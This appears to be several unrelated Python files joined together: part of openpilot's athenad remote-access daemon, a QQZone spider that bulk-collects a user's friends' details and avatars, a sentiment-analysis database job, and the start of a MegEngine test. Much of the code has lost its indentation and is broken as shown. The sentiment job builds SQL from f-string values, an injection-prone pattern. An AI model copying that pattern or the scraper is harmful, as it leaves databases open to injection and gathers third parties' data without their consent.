f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
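# Illustrative sketch of scan_dir's two-way prefix test (hypothetical names):
# a partial directory name matches because rel_path starts with the prefix,
# and a prefix that reaches into a file matches because the prefix starts
# with the directory's rel_path.
def _prefix_match_demo():
  rel_path = "2021-01-01--12-00-00/"
  assert rel_path.startswith("2021-01-01--1")
  assert "2021-01-01--12-00-00/rlog.bz2".startswith(rel_path)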
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = {item.id for item in list(upload_queue.queue)}
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
dongle_id = Params().get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
  except Exception:
    cloudlog.exception("athenad.startLocalProxy.exception")
    raise
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
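# Illustrative note on get_logs_to_send_sorted: a log is (re)sent when it has
# no send-timestamp xattr yet, or was marked sent more than an hour ago (the
# response is assumed lost); sorted(logs)[:-1] holds back the newest file,
# which is still being written to.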
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path) as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
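        # e.g. a 10 kB payload is sent as frames of 4096, 4096 and 2048 bytes:
        # TEXT, CONT, CONT, with the fin bit set only on the last frame.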
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
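# Illustrative sketch of backoff()'s jitter window (not used elsewhere): the
# delay is uniform over an exponentially growing range capped at 128 seconds.
def _backoff_window_demo():
  return {retries: min(128, int(2 ** retries)) for retries in (0, 1, 5, 7, 10)}
  # -> {0: 1, 1: 2, 5: 32, 7: 128, 10: 128}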
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
UploadQueueCache.initialize(upload_queue)
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
QQZoneFriendSpider.py | from src.spider.QQZoneSpider import QQZoneSpider
from urllib import parse
import json
import pandas as pd
from src.util import util
import math
import threading
import datetime
from src.util.constant import FINISH_FRIEND_INFO_ALL, STOP_FRIEND_INFO_SPIDER_KEY, WEB_SPIDER_INFO, \
FRIEND_INFO_PRE, FRIEND_INFO_COUNT_KEY, EXPIRE_TIME_IN_SECONDS, FRIEND_LIST_KEY, STOP_SPIDER_KEY, STOP_SPIDER_FLAG, \
FRIEND_NUM_KEY
from src.util.util import remove_special_tag
class QQZoneFriendSpider(QQZoneSpider):
"""
    Crawl basic information about the user's own friends (friend count, shared groups, etc.); this does not crawl friends' feeds.
"""
def __init__(self, use_redis=False, debug=False, analysis=True, recover=False,
username='', mood_begin=0, mood_num=-1, stop_time='-1', from_web=False, nickname='', no_delete=True, cookie_text='',
                 export_excel=False, export_csv=True, pool_flag='127.0.0.1',
download_small_image=False, download_big_image=False,
download_mood_detail=True, download_like_detail=True, download_like_names=True):
"""
        :param use_redis: whether to use redis
        :param debug: whether to enable debug mode
        :param analysis: if True, run the spider first and then the analysis; if False, run only the analysis
"""
QQZoneSpider.__init__(self, use_redis, debug, recover=recover, username=username, mood_num=mood_num,
mood_begin=mood_begin, stop_time=stop_time, from_web=from_web, nickname=nickname,
no_delete=no_delete, cookie_text=cookie_text, pool_flag=pool_flag, download_small_image=download_small_image, download_big_image=download_big_image,
download_mood_detail=download_mood_detail, download_like_detail=download_like_detail,
download_like_names=download_like_names)
        if self.g_tk == 0 and not analysis:
self.login()
self.friend_detail = []
self.friend_list = []
self.friend_df = pd.DataFrame()
self.re = self.connect_redis()
self.friend_thread_list = []
self.export_excel = export_excel
self.export_csv = export_csv
self.error_friend_num = 0
def get_friend_list(self):
"""
        Fetch the friend list.
        :return: the number of friends
"""
friend_list_url = self.get_friend_list_url()
friend_content = self.get_json(self.req.get(url=friend_list_url, headers=self.headers, timeout=20).content.decode('utf-8'))
self.friend_list = json.loads(friend_content)['data']['items']
if self.use_redis:
self.re.set(FRIEND_LIST_KEY + self.username, json.dumps(self.friend_list, ensure_ascii=False))
if not self.no_delete:
self.re.expire(FRIEND_LIST_KEY + self.username, EXPIRE_TIME_IN_SECONDS)
self.save_data_to_json(self.friend_list, self.FRIEND_LIST_FILE_NAME)
        print('Finished fetching the friend list')
return len(self.friend_list)
def download_head_image(self):
"""
        Download friends' avatars.
        No cookie authentication is required.
:return:
"""
if len(self.friend_list) == 0:
self.load_friend_data()
friend_num = len(self.friend_list)
thread_num = self.calculate_thread_num(friend_num)
print("下载头像的线程数量:", thread_num)
begin_time = datetime.datetime.now()
thread_list = []
for i in range(thread_num):
t = threading.Thread(target=self.do_download_image, args=(i, friend_num, thread_num))
thread_list.append(t)
for t in thread_list:
t.setDaemon(False)
t.start()
for t in thread_list:
t.join()
        print('Time elapsed:', (datetime.datetime.now() - begin_time).seconds, 'seconds')
        print("Finished downloading all avatars")
    def do_download_image(self, index, friend_num, step=1):
while index < friend_num:
item = self.friend_list[index]
url = item['img']
if self.debug:
print(url)
name = item['uin']
self.download_image(url, self.FRIEND_HEADER_IMAGE_PATH + str(name))
index += step
def get_friend_detail(self):
"""
        Fetch per-friend details based on the friend list.
:return:
"""
try:
friend_num = self.get_friend_list()
if self.use_redis:
self.re.set(FRIEND_NUM_KEY + self.username, friend_num)
if not self.no_delete:
self.re.expire(FRIEND_NUM_KEY + self.username, EXPIRE_TIME_IN_SECONDS)
if self.use_redis:
self.re.rpush(WEB_SPIDER_INFO + self.username, FRIEND_INFO_PRE + ":" + str(friend_num))
if not self.no_delete:
self.re.expire(WEB_SPIDER_INFO + self.username, EXPIRE_TIME_IN_SECONDS)
self.user_info.friend_num = friend_num
thread_num = self.calculate_thread_num(friend_num)
self.logging_info("获取好友基本信息的线程数量:" + str(thread_num))
self.logging_info("开始获取好友数据...")
for i in range(thread_num):
begin_index = i
t = threading.Thread(target=self.do_get_friend_detail, args=(begin_index, friend_num, thread_num, True))
self.friend_thread_list.append(t)
for t in self.friend_thread_list:
t.setDaemon(False)
t.start()
            # Wait for all child threads to finish
for t in self.friend_thread_list:
t.join()
except BaseException as e:
self.format_error(e, "Faled to get friend info")
if self.use_redis:
self.re.set(STOP_FRIEND_INFO_SPIDER_KEY + self.username, FINISH_FRIEND_INFO_ALL)
self.re.set(self.FRIEND_DETAIL_FILE_NAME, json.dumps(self.friend_detail, ensure_ascii=False))
if not self.no_delete:
self.re.expire(STOP_FRIEND_INFO_SPIDER_KEY + self.username, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.FRIEND_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
else:
self.save_data_to_json(self.friend_detail, self.FRIEND_DETAIL_FILE_NAME)
print("获取好友数据成功,文件路径为:", self.FRIEND_DETAIL_FILE_NAME)
    # Ensure each thread crawls at least 20 items, and open at most self.thread_num threads
def calculate_thread_num(self, num):
if num >= 20 * self.thread_num:
thread_num = self.thread_num
else:
thread_num = math.ceil(num / 20)
return thread_num
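    # Example (illustrative) for calculate_thread_num: with self.thread_num == 10,
    # 500 friends use all 10 threads (500 >= 20 * 10), while 45 friends use
    # math.ceil(45 / 20) == 3 threads, keeping roughly 20 requests per thread.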
def do_get_friend_detail(self, index, friend_num, step=1, until_stop_time=True):
        # Guard against step being 0 (happens when the friend count is 0)
if step < 1:
step = 1
while index < friend_num and until_stop_time:
friend = self.friend_list[index]
uin = friend['uin']
if self.debug:
                print('Crawling data for friend:', uin, '...,', 'index=', index)
url = self.get_friend_detail_url(uin)
content = self.get_json(self.req.get(url, headers=self.headers, timeout=20).content.decode('utf-8'))
data = json.loads(content)
try:
data = data['data']
data['friendUin'] = uin
except BaseException as e:
self.format_error(e, friend)
if self.debug:
print(data)
self.error_friend_num += 1
continue
finally:
index += step
self.friend_detail.append(data)
if self.use_redis:
                # The length of friend_detail is stored here; with multiple threads, only friend_detail reflects all of the data
self.re.set(FRIEND_INFO_COUNT_KEY + self.username, len(self.friend_detail) + self.error_friend_num)
if not self.no_delete:
self.re.expire(FRIEND_INFO_COUNT_KEY + self.username, EXPIRE_TIME_IN_SECONDS)
until_stop_time = False if self.re.get(STOP_SPIDER_KEY + str(self.username)) == STOP_SPIDER_FLAG else True
def get_friend_list_url(self):
friend_url = 'https://user.qzone.qq.com/proxy/domain/r.qzone.qq.com/cgi-bin/tfriend/friend_show_qqfriends.cgi?'
params = {
'uin': self.username,
'follow_flag': 0,
'groupface_flag': 0,
'fupdate': 1,
'g_tk': self.g_tk,
'qzonetoken': ''
}
friend_url = friend_url + parse.urlencode(params)
return friend_url
def get_friend_detail_url(self, uin):
detail_url = 'https://user.qzone.qq.com/proxy/domain/r.qzone.qq.com/cgi-bin/friendship/cgi_friendship?'
params = {
'activeuin': self.username,
'passiveuin': uin,
'situation': 1,
'isCalendar': 1,
'g_tk': self.g_tk
}
return detail_url + parse.urlencode(params)
def load_friend_data(self):
try:
if self.use_redis:
self.friend_detail = self.re.get(self.FRIEND_DETAIL_FILE_NAME)
self.friend_list = self.re.get(self.FRIEND_LIST_FILE_NAME)
if self.friend_detail is None or self.friend_list is None:
raise BaseException
else:
raise BaseException
except BaseException as e:
if self.use_redis:
self.format_error(e, "Failed to load data from redis")
print("try to load data from json now")
try:
self.friend_detail = self.load_data_from_json(self.FRIEND_DETAIL_FILE_NAME)
self.friend_list = self.load_data_from_json(self.FRIEND_LIST_FILE_NAME)
if self.friend_detail is None or self.friend_list is None:
raise FileNotFoundError
print("Success to load data from json")
except FileNotFoundError as e:
self.format_error(e, "Failed to load data from json...")
print("now, try to start spider to get friend info...")
self.friend_list = []
self.friend_detail = []
self.login()
self.get_friend_detail()
def clean_friend_data(self):
"""
        Clean the friend data and generate a csv file.
:return:
"""
try:
if len(self.friend_list) == 0:
self.load_friend_data()
friend_total_num = len(self.friend_list)
print("valid friend num:", friend_total_num)
friend_list_df = pd.DataFrame(self.friend_list)
self.friend_detail_list = []
if friend_total_num == 0:
print("该用户没有好友")
return False
for friend in self.friend_detail:
try:
friend_uin = friend['friendUin']
add_friend_time = friend['addFriendTime']
img = friend_list_df.loc[friend_list_df['uin'] == friend_uin, 'img'].values[0]
nick = friend['nick']
nick_name = remove_special_tag(nick[str(friend_uin)])
common_friend_num = len(friend['common']['friend'])
common_group_num = len(friend['common']['group'])
common_group_names = friend['common']['group']
self.friend_detail_list.append(
dict(uin=self.username, friend_uin=friend_uin, add_friend_time=add_friend_time,
nick_name=nick_name, common_friend_num=common_friend_num,
common_group_num=common_group_num, common_group_names=common_group_names, img=img))
except BaseException as e:
if self.debug:
print("单向好友:", friend)
self.friend_detail_list.append(
dict(uin=0, friend_uin=friend['friendUin'], add_friend_time=0,
                         nick_name='one-way friend', common_friend_num=0,
common_group_num=0, common_group_names='', img=''))
friend_df = pd.DataFrame(self.friend_detail_list)
friend_df.sort_values(by='add_friend_time', inplace=True)
friend_df['add_friend_time2'] = friend_df['add_friend_time'].apply(lambda x: util.get_full_time_from_mktime(x))
friend_df.fillna('', inplace=True)
if self.export_excel:
friend_df.to_excel(self.FRIEND_DETAIL_EXCEL_FILE_NAME)
if self.export_csv:
friend_df.to_csv(self.FRIEND_DETAIL_LIST_FILE_NAME)
if self.debug:
print("Finish to clean friend data...")
print("File Name:", self.FRIEND_DETAIL_LIST_FILE_NAME)
self.friend_df = friend_df
return True
except BaseException as e:
self.format_error(e, "Failed to parse friend_info")
return False
def get_friend_total_num(self):
self.load_friend_data()
friend_total_num = len(self.friend_list)
return friend_total_num
def calculate_friend_num_timeline(self, timestamp, friend_df):
"""
        :param timestamp: the timestamp to evaluate at
        :return: the user's friend count at the given point in time
"""
friend_total_num = friend_df.shape[0]
friend_df_time = friend_df[friend_df['add_friend_time'] > timestamp]
friend_time_num = friend_total_num - friend_df_time.shape[0]
if self.debug:
print(util.get_standard_time_from_mktime(timestamp), friend_time_num)
return friend_time_num
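        # Example (illustrative) for calculate_friend_num_timeline: with 300
        # friends in total and 40 rows whose add_friend_time is later than the
        # given timestamp, the user had 300 - 40 == 260 friends at that moment.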
def get_friend_result_file_name(self):
return self.FRIEND_DETAIL_LIST_FILE_NAME
def get_most_common_friend(self):
if self.friend_df.empty:
try:
self.friend_df = pd.read_csv(self.FRIEND_DETAIL_LIST_FILE_NAME)
except FileNotFoundError:
self.clean_friend_data()
max_index = self.friend_df['common_friend_num'].max()
most_friend = self.friend_df.loc[self.friend_df['common_friend_num'] == max_index, ['common_friend_num', 'nick_name']].values[0]
self.user_info.most_common_friend_num = most_friend[0]
self.user_info.most_friend = most_friend[1]
def get_most_group(self):
if self.friend_df.empty:
try:
self.friend_df = pd.read_csv(self.FRIEND_DETAIL_LIST_FILE_NAME)
except FileNotFoundError:
self.clean_friend_data()
self.friend_df.fillna('', inplace=True)
common_group_names = self.friend_df['common_group_names']
common_group_names_list = []
for item in common_group_names:
if item != '':
try:
if type(item) != list:
item = json.loads(item.replace('\'', '\"'))
common_group_names_list.extend(item)
except:
pass
if len(common_group_names_list) > 0:
df = pd.DataFrame(common_group_names_list)
df['count'] = 1
result = df.groupby(by='name').agg({'count': sum}).reset_index()
most_group = result.loc[result['count'] == result['count'].max(), :].values[0]
self.user_info.most_group = most_group[0]
self.user_info.most_group_member = most_group[1]
print(most_group)
def get_first_friend_info(self):
if self.friend_df.empty:
try:
self.friend_df = pd.read_csv(self.FRIEND_DETAIL_LIST_FILE_NAME)
except FileNotFoundError:
self.clean_friend_data()
self.get_single_friend()
# self.user_info.friend_num = self.friend_df.shape[0]
zero_index = self.friend_df[self.friend_df['add_friend_time'] == 0].index
self.friend_df.drop(index=zero_index, axis=0, inplace=True)
self.friend_df.reset_index(inplace=True)
early_time = util.get_standard_time_from_mktime(self.friend_df.loc[0,'add_friend_time'])
early_nick = self.friend_df.loc[0, 'nick_name']
first_header_url = self.FRIEND_HEADER_IMAGE_PATH + str(int(self.friend_df.loc[0, 'friend_uin'])) + '.jpg'
self.user_info.first_friend = early_nick
self.user_info.first_friend_time = early_time
self.user_info.first_friend_header = first_header_url
self.user_info.save_user()
def get_single_friend(self):
single_friend = self.friend_df[self.friend_df['uin'] == 0].shape[0]
self.user_info.single_friend = single_friend
if __name__ == '__main__':
friend_spider = QQZoneFriendSpider(use_redis=True, debug=True, analysis=False)
friend_spider.get_friend_detail()
friend_spider.download_head_image()
friend_spider.clean_friend_data()
friend_spider.get_first_friend_info()
# friend_spider.calculate_friend_num_timeline(1411891250)
|
sentiment_analysis.py | """Generate account statements.
This module will create statement records for each account.
"""
import os
import threading
import psycopg2
from transformers import pipeline
from api.services.transformers import overall_sentiment_transformers
from flask import Flask
import config
from utils.logger import setup_logging, log_info
from dbms import client, Databse
setup_logging(
os.path.join(os.path.abspath(os.path.dirname(__file__)), "logging.conf")
) # important to do this first
APP_CONFIG = config.get_named_config(os.getenv("DEPLOYMENT_ENV", "production"))
class LoadModel: # pylint: disable=too-few-public-methods
"""Manages the model."""
classifier = None
model_id = APP_CONFIG.MODEL_ID
@classmethod
def preload_models(cls):
"""Function to load the fine-tuned transformer model."""
cls.classifier = pipeline(
"sentiment-analysis", model=cls.model_id, truncation=True
)
return 0
# pylint:disable=no-member
def create_app(run_mode=os.getenv("FLASK_ENV", "production")):
"""Return a configured Flask App using the Factory method."""
app = Flask(__name__)
app.config.from_object(config.CONFIGURATION[run_mode])
app.logger.info("<<<< Starting Sentiment analysis job >>>>")
register_shellcontext(app)
preloading = threading.Thread(target=LoadModel.preload_models)
log_info("Model is loading...")
if LoadModel.model_id is None:
raise RuntimeError("Model id cannot be empty")
preloading.start()
log_info(f"Model id: {LoadModel.model_id}")
preloading.join()
log_info("Model loading complete.")
app.classifier = LoadModel.classifier
return app
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {"app": app} # pragma: no cover
app.shell_context_processor(shell_context)
def update_sentiment():
"""Update sentiment by querying the records."""
conn = None
try:
log_info("Starting sentiment analysis.")
# connect to the PostgreSQL server
conn = client.connect(Databse[APP_CONFIG.DBMS].value, APP_CONFIG)
table_name = APP_CONFIG.DATABASE_TABLE_NAME
input_col = APP_CONFIG.DATABASE_INPUT_COLUMN
output_col = APP_CONFIG.DATABASE_OUTPUT_COLUMN
# Find primary key for the table.
primary_keys = _find_primary_keys(conn, table_name)
log_info(f"found primary keys : {primary_keys}")
# Query the rows from table.
rows_query = client.get_row_query(
Databse[APP_CONFIG.DBMS].value,
primary_keys,
input_col,
table_name,
output_col,
limit=100,
app_config=APP_CONFIG,
)
log_info("Query executed")
try:
cur = conn.cursor()
cur.execute(rows_query)
colnames = [desc[0] for desc in cur.description]
results = cur.fetchall()
finally:
cur.close()
_perform_analysis(colnames, conn, results)
# commit the changes
conn.commit()
except (Exception, psycopg2.DatabaseError) as error: # noqa
raise error
finally:
if conn is not None:
conn.close()
def _find_primary_keys(conn, table_name):
"""Fetch the primary keys of rows that match the pf_query."""
# Generalized query to support different databases.
pk_query = (
f"SELECT column_name FROM information_schema.table_constraints AS tc "
f"JOIN information_schema.key_column_usage AS kc ON tc.CONSTRAINT_CATALOG = "
f"kc.CONSTRAINT_CATALOG AND tc.CONSTRAINT_SCHEMA = "
f"kc.CONSTRAINT_SCHEMA AND tc.CONSTRAINT_NAME "
f" = kc.CONSTRAINT_NAME AND tc.TABLE_CATALOG = kc.TABLE_CATALOG AND tc.TABLE_SCHEMA "
f"= kc.TABLE_SCHEMA AND tc.TABLE_NAME = kc.TABLE_NAME "
f"WHERE constraint_type = 'PRIMARY KEY' AND (tc.table_name) = "
f"('{table_name}') ORDER BY ordinal_position;"
)
try:
cur = conn.cursor()
cur.execute(pk_query)
primary_keys = ",".join(cur.fetchall()[0])
finally:
cur.close()
return primary_keys
def _perform_analysis(colnames, conn, results):
# Create a list of dicts with column name and results.
table_name = APP_CONFIG.DATABASE_TABLE_NAME
input_col = APP_CONFIG.DATABASE_INPUT_COLUMN
output_col = APP_CONFIG.DATABASE_OUTPUT_COLUMN
if APP_CONFIG.SCHEMA_NAME:
table_name = f"{APP_CONFIG.SCHEMA_NAME}.{table_name}"
query_results = [dict(zip(colnames, result)) for result in results]
count: int = 0
for result_dict in query_results:
log_info(f"Finding sentiment for for {result_dict}")
sentiment = overall_sentiment_transformers(result_dict.get(input_col))
log_info(f"Sentiment {sentiment}")
update_qry = f"update {table_name} set {output_col}='{sentiment}' where 1=1 "
for key, value in result_dict.items():
if key != input_col:
update_qry += f" AND {key}='{value}' "
try:
cur = conn.cursor()
cur.execute(update_qry)
finally:
cur.close()
count += 1
print(f"Updated {count} records")
def run():
"""Run the job."""
application = create_app()
application.app_context().push()
update_sentiment()
if __name__ == "__main__":
run()
|
test_distributed.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import subprocess
import sys
import numpy as np
import pytest
def worker(master_ip, master_port, world_size, rank, dev, trace):
import megengine.distributed as dist
import megengine.functional as F
from megengine import is_cuda_available
from megengine import jit
from megengine.module import Linear, Module
from megengine.optimizer import SGD
if not is_cuda_available():
return
class MLP(Module):
def __init__(self):
super().__init__()
self.fc0 = Linear(3 * 224 * 224, 500)
self.fc1 = Linear(500, 10)
def forward(self, x):
x = self.fc0(x)
x = F.relu(x)
x = self.fc1(x)
return x
dist.init_process_group(
        master_ip=master_ip, master_port=master_port, world_size=world_size, rank=rank, dev=dev
)
net = MLP()
opt = SGD(net.parameters(requires_grad=True), lr=0.02)
data = np.random.random((64, 3 * 224 * 224)).astype(np.float32)
label = np.random.randint(0, 10, size=(64,)).astype(np.int32)
jit.trace.enabled = trace
@jit.trace()
def train_func(data, label):
pred = net(data)
loss = F.cross_entropy_with_softmax(pred, label)
opt.backward(loss)
return loss
for i in range(5):
opt.zero_grad()
loss = train_func(data, label)
opt.step()
def start_workers(worker, world_size, trace=False):
def run_subproc(rank):
cmd = "from test.integration.test_distributed import worker\n"
cmd += "worker('localhost', 3456, {}, {}, {}, {})".format(
world_size, rank, rank, "True" if trace else "False"
)
cmd = [sys.executable, "-c", cmd]
ret = subprocess.run(
cmd, stdout=sys.stdout, stderr=sys.stderr, universal_newlines=True
)
assert ret.returncode == 0, "subprocess failed"
procs = []
for rank in range(world_size):
p = mp.Process(target=run_subproc, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join()
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
